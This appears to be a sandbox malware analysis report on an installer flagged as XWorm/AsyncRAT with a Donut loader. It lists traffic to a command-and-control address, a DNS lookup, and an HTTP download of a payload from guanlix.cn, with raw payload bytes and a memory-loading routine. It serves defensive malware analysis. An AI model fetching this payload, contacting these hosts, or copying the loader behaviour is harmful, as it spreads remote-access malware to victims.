Jul 2, 2024 19:23:04.114562988 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:04.116328001 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:04.117592096 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:04.117608070 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:04.117641926 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:04.120734930 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:04.120803118 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:04.127588034 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:04.128066063 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:04.129214048 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:04.129854918 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:04.140320063 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:07.959012985 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:07.964540958 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.005868912 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.010741949 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.021596909 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.026422977 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.068234921 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.073265076 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.177643061 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.182636023 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.193125963 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.197958946 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.224311113 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.229980946 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.288450003 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.291220903 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.296410084 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.518785954 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.521006107 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.525902033 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.751820087 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.753638983 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.758588076 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.758647919 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.763489008 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.981899977 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:08.984333992 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:08.989227057 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:15.990151882 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:15.994988918 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:16.318803072 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:16.321343899 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:16.326133013 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:18.334089041 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:18.338970900 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:18.661775112 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:18.661875963 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:18.666661978 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:18.668581009 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:18.673379898 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:18.987014055 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:18.994548082 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:18.999480009 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:20.411755085 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:20.458408117 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:23.833760977 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:23.838692904 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:23.849277973 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:23.854249954 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:24.162863016 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:24.165126085 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:24.169897079 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:24.395735979 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:24.397407055 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:24.410382986 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:27.990624905 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:27.995441914 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:28.319869995 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:28.321887016 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:28.330295086 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.130672932 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.135530949 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.161998034 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.166848898 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.271461010 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.276649952 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.318464041 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.323698997 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.349386930 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.354468107 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.459237099 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.461656094 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.466471910 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.690136909 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.691966057 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.697695017 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.921214104 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.930197954 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.935081959 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.936249971 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.941173077 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:34.945099115 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:34.949937105 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:47.787884951 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:47.792819023 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:48.116353035 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:48.118292093 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:48.124032021 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:48.302916050 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:48.308233976 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:48.734982967 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:48.738965034 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:48.744268894 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:50.193258047 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:50.198143005 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:50.224258900 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:50.229114056 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:50.413168907 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:50.458467960 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:50.643094063 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:50.645178080 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:50.649924040 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:50.919321060 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:50.928309917 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:50.933199883 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:01.706901073 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:01.711869001 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:02.032432079 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:02.034761906 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:02.039556026 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:04.930875063 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:04.935707092 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:05.256546021 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:05.262367010 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:05.267117977 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:06.005727053 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:06.011322021 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:06.337575912 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:06.341160059 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:06.346271992 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:11.959001064 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:11.963993073 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:12.285346031 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:12.287755966 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:12.292540073 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:16.208780050 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:16.214085102 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:16.538374901 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:16.540339947 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:16.545120955 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:20.193352938 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:20.198210955 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:20.417272091 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:20.458439112 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:20.701064110 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:20.703126907 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:20.707892895 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:26.568197012 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:26.572968960 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:26.896312952 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:26.899323940 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:26.904160976 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:36.943370104 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:36.948180914 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:36.958794117 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:36.963577032 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:37.274439096 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:37.282253981 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:37.287156105 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:37.515722036 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:37.528079987 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:37.532898903 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:39.333678007 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:39.339329004 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:39.666112900 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:39.668134928 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:39.673065901 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:42.255743027 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:42.260824919 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:42.584285021 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:42.586925030 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:42.591864109 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:48.349273920 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:48.354377031 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:48.674994946 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:48.677648067 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:24:48.682595015 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:50.403516054 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:24:50.458458900 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:25:00.630534887 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:25:00.635405064 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:25:00.956203938 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:25:00.960560083 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:25:00.965763092 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:25:03.177566051 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:25:03.183125019 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:25:03.515460014 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:25:03.516211987 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:25:03.521011114 CEST	7000	49705	117.41.184.33	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:20:57.044548988 CEST	62646	53	192.168.2.5	1.1.1.1
Jul 2, 2024 19:20:57.490317106 CEST	53	62646	1.1.1.1	192.168.2.5
Jul 2, 2024 19:21:17.157212973 CEST	53	51942	1.1.1.1	192.168.2.5
Jul 2, 2024 19:21:22.278636932 CEST	53	53854	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 19:20:57.044548988 CEST	192.168.2.5	1.1.1.1	0xf935	Standard query (0)	guanlix.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 19:20:57.490317106 CEST	1.1.1.1	192.168.2.5	0xf935	No error (0)	guanlix.cn		91.208.240.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

guanlix.cn:881

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	91.208.240.157	881	4292	C:\Users\user\Desktop\33-o_Installer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 19:20:57.503222942 CEST	93	OUT	GET /33.ccp HTTP/1.1 User-Agent: Download Host: guanlix.cn:881 Cache-Control: no-cache
Jul 2, 2024 19:20:58.440746069 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Tue, 02 Jul 2024 17:20:41 GMT Content-Type: application/octet-stream Content-Length: 71938 Last-Modified: Wed, 12 Jun 2024 10:07:44 GMT Connection: keep-alive ETag: "66697370-11902" Accept-Ranges: bytes Data Raw: e8 88 bb 00 00 88 bb 00 00 58 6d fb 30 4e 7e 88 32 a2 6f 69 d3 f9 fa 9a de 2f 3a c5 c9 ab 23 45 fc ba f0 f2 a1 14 af 35 d5 00 00 00 00 72 d9 9a f4 56 15 83 7f 51 7f 5a 06 d3 a2 08 d5 c4 78 e4 ff 0d 47 a9 16 dd 99 d1 0c f7 ed 32 fd 17 06 ba cc 7c 27 cd 13 e0 cc a7 f0 a1 1a 42 09 75 fb 8a fd 5c ed d7 8f f9 64 23 f4 82 cc 3e 98 03 b5 94 ca 48 e1 dd 6e 27 f7 a4 ef b9 48 34 6e c9 db fe 57 ed ca b3 14 ff c2 bf 03 a0 6b e0 ef 3e da d5 95 a1 57 34 c2 8a e0 91 b8 e0 1e 77 84 18 4a a1 1f ae 5a 97 f2 ac 24 40 05 a3 e4 8c 84 2f bd d8 fb 8e 4d 3f 13 a7 3d 6f a6 13 ac 27 e9 83 b0 7a 1b da ed fb b0 24 e3 2e a3 c2 25 00 a0 83 d3 b9 59 bc 2e 22 14 29 0a 7c 94 3f e1 51 f3 3a 75 a6 5d 6c c0 c7 8c c7 c5 4c e6 47 50 1a 66 d7 8e b6 bd 2f 4c 89 69 7a 56 cc cf 6e c4 48 76 85 0e d7 7b 0a 55 61 90 78 e7 7f 42 56 95 4f 53 d5 16 a6 f7 7c 99 24 3b 8c f0 40 61 60 d2 d7 5f 16 05 bf f1 ae 8e 0b a2 9f d5 7d d9 df a3 f5 c7 6b 08 8c f3 b2 e2 4d e8 ee 27 28 1c 81 1d d8 be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: Xm0N~2oi/:#E5rVQZxG2\|'Bu\d#>Hn'H4nWk>W4wJZ$@/M?=o'z$.%Y.")\|?Q:u]lLGPf/LizVnHv{UaxBVOS\|$;@a`_}kM'((jYY2IPZPk<ATHYZIp37\<m`w(gw!)@{3h"l=jzZ^TVk^[WJ\s>WyNn"jXBdZLx {J1_\<p.NoND?=/Nr*X<8:PHMOt^\|"XE?iI'g]Ek(E]F,A}?tQ }5l\TT$NfHP9#3qKox~.kkhN;<_rm{oRp?-E

Target ID:	0
Start time:	13:20:55
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\33-o_Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\33-o_Installer.exe"
Imagebase:	0xdc0000
File size:	249'344 bytes
MD5 hash:	BAF30C254157B0F36A967CCFDB3850ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	11%
Signature Coverage:	2%
Total number of Nodes:	799
Total number of Limit Nodes:	79

Executed Functions

Function 0583B3F8 Relevance: 12.2, Strings: 9, Instructions: 910COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0583B917
(o]q, xrefs: 0583B51D
,aq, xrefs: 0583B8A8
(o]q, xrefs: 0583B5BA
(o]q, xrefs: 0583B9C9
,aq, xrefs: 0583B898
(o]q, xrefs: 0583B436
(o]q, xrefs: 0583B4F1
(o]q, xrefs: 0583B907

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-99275883
Opcode ID: abf416081c55e3a979a18a15252d72a98f9324c2e2aee33887ac4b9c18f5e2f4
Instruction ID: b202f641a6c86da2d16e64e98e2696bec6fc04960869d4aaf23e563cc338b10b
Opcode Fuzzy Hash: abf416081c55e3a979a18a15252d72a98f9324c2e2aee33887ac4b9c18f5e2f4
Instruction Fuzzy Hash: 66824BB4A04609DFCB14CFA8D585AAEBBF2FF88315F158559E846DB2A1D730EC41CB90

Function 0583A6B8 Relevance: 8.4, Strings: 6, Instructions: 896COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0583AF28
(o]q, xrefs: 0583ABE2
,aq, xrefs: 0583AFA0
(o]q, xrefs: 0583AF1A
Haq, xrefs: 0583AAAE
,aq, xrefs: 0583AF92

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq$Haq
API String ID: 0-387163720
Opcode ID: 490c7637e7eee5756cd84aa55ef28d857398c33b3cf6c253dae7d79c03cb26bd
Instruction ID: c4b54fb765b4e396f8a4ace3a882dffe69f30161c33bce02523a833ac7692588
Opcode Fuzzy Hash: 490c7637e7eee5756cd84aa55ef28d857398c33b3cf6c253dae7d79c03cb26bd
Instruction Fuzzy Hash: A9728074A002199FCB18DF69C895AAEBBF6FF88301F148569E845EB391DB34DD41CB90

Function 0583ED84 Relevance: 2.2, Strings: 1, Instructions: 942COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0583F8D3

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 2dd56bcdbc2ba334bcb8be3327787e13deea0ad80dad84bc02c3dff9bd9a22eb
Instruction ID: 91235e63a38346e2da46ff213bf71b224cd06c55e805b66957be9d345d34b8b0
Opcode Fuzzy Hash: 2dd56bcdbc2ba334bcb8be3327787e13deea0ad80dad84bc02c3dff9bd9a22eb
Instruction Fuzzy Hash: 60629E34B002059FDB18EB78D469B2E77A7FB88305F158529E906DB394EF389D428BD1

Function 00DC25C8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC25C8

Part of subcall function 00DC221D: __EH_prolog.LIBCMT ref: 00DC2222

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
Instruction ID: 0f4348cfe00aaae5ec5a875b8840b17060a1bacba83958b5d89413b70ced6fd7
Opcode Fuzzy Hash: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
Instruction Fuzzy Hash: C611287590025AEFCF11DF98CA91EAEBBB4FF18314F10805EE51267252C7719A00DBB1

Function 05834D08 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vl, xrefs: 05834FBF

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID:
String ID: \Vl
API String ID: 0-682378881
Opcode ID: 484268a176c6bea32cb2c0357db183a76d83ff5dbce8e317ce4de577d8e8c232
Instruction ID: f0c31071fc194b3314b4b755a82e15c79638b2d28a1474ef79adbe25547ec455
Opcode Fuzzy Hash: 484268a176c6bea32cb2c0357db183a76d83ff5dbce8e317ce4de577d8e8c232
Instruction Fuzzy Hash: 61B14C70E042099FDF14CFA9C98ABEDBBF2BF88314F148129D815E7264EB759845CB81

Function 058355D8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 378a51f097e41025990eeadff10669bc2bf412499ada0baf5c3b425196db0f27
Instruction ID: a302c97e81392171162ac4c8ad9bc65fcae8a024da1b5af7aba9f05f58ad4c34
Opcode Fuzzy Hash: 378a51f097e41025990eeadff10669bc2bf412499ada0baf5c3b425196db0f27
Instruction Fuzzy Hash: 7BB14E70E04209DFDF14CFA9D9867AEBBF2BF88314F148529D819EB254EB749845CB81

Function 00DC11E1 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00DC11EF
Sleep.KERNEL32(0000012C), ref: 00DC11F9
GetTickCount64.KERNEL32 ref: 00DC11FF

Part of subcall function 00DC4424: __vwprintf_l.LIBCMT ref: 00DC4432

CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00DC1244
GetFileSize.KERNEL32(00000000,00000000), ref: 00DC124E
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00DC125F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DC1270
